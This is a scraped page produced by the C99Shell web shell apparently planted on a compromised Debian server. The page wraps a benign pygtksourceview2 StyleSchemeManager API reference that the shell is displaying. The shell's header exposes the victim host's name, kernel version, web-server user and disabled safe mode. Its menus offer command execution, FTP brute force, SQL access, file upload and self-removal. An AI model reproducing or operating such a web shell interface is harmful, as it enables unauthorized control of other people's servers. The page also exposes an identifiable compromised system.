!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.16 (Debian). PHP/5.3.3-7+squeeze19 

uname -a: Linux mail.tri-specialutilitydistrict.com 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC
2014 x86_64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/gtk-doc/html/pygtksourceview2/   drwxr-xr-x
Free 129.61 GB of 142.11 GB (91.2%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     class-gtksourcestyleschememanager2.html (15.48 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
gtksourceview2.StyleSchemeManager

gtksourceview2.StyleSchemeManager

gtksourceview2.StyleSchemeManager — Scheme Manager object for gtksourceview2.View

Properties

"scheme-ids"ReadList of the ids of the available schemes.
"search-path"Read-WriteList of of directories and files where the style schemes are located.

Description

Interface to manage available and custom style schemes.

Constructor

    gtksourceview2.StyleSchemeManager()

Returns :

a new gtksourceview2.StyleSchemeManager.

Creates a new gtksourceview2.StyleSchemeManager object.

Methods

gtksourceview2.StyleSchemeManager.append_search_path

    def append_search_path(path)

path :

a directory or a filename.

The append_search_path() method appends path to the list of directories where the manager looks for style scheme files. See gtksourceview2.StyleSchemeManager.set_search_path() for details.

gtksourceview2.StyleSchemeManager.force_rescan

    def force_rescan()

The force_rescan() method mark any currently cached information about the available style scehems as invalid. All the available style schemes will be reloaded next time the manager is accessed.

gtksourceview2.StyleSchemeManager.get_scheme

    def get_scheme(scheme_id)

scheme_id :

style scheme id to find.

Returns :

a gtksourceview2.StyleScheme object.

The get_scheme() method looks up style scheme by id.

gtksourceview2.StyleSchemeManager.get_scheme_ids

    def get_scheme_ids()

Returns :

a list of strings containing the ids of the available style schemes or None if no style scheme is available.

The get_scheme_ids() method returns the ids of the available style schemes.

gtksourceview2.StyleSchemeManager.get_search_path

    def get_search_path()

Returns :

a list of string containing the search path.

The get_search_path() method gets the Returns the current search path for the manager, See gtksourceview2.StyleSchemeManager.set_search_path() for details.

gtksourceview2.StyleSchemeManager.prepend_search_path

    def prepend_search_path(path)

path :

a directory or a filename.

The prepend_search_path() method prepends path to the list of directories where the manager looks for style scheme files. See gtksourceview2.StyleSchemeManager.set_search_path() for details.

gtksourceview2.StyleSchemeManager.set_search_path

    def set_search_path(dirs)

dirs :

a list of dirs (as string).

The set_search_path() method sets the list of directories where the manager looks for style scheme files. If dirs is None, the search path is reset to default.

Functions

gtksourceview2.language_manager_get_default

    def gtksourceview2.language_manager_get_default()

Returns :

a gtksourceview2.StyleSchemeManager.

The language_manager_get_default() function Returns the default gtksourceview2.StyleSchemeManager instance.


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0185 ]--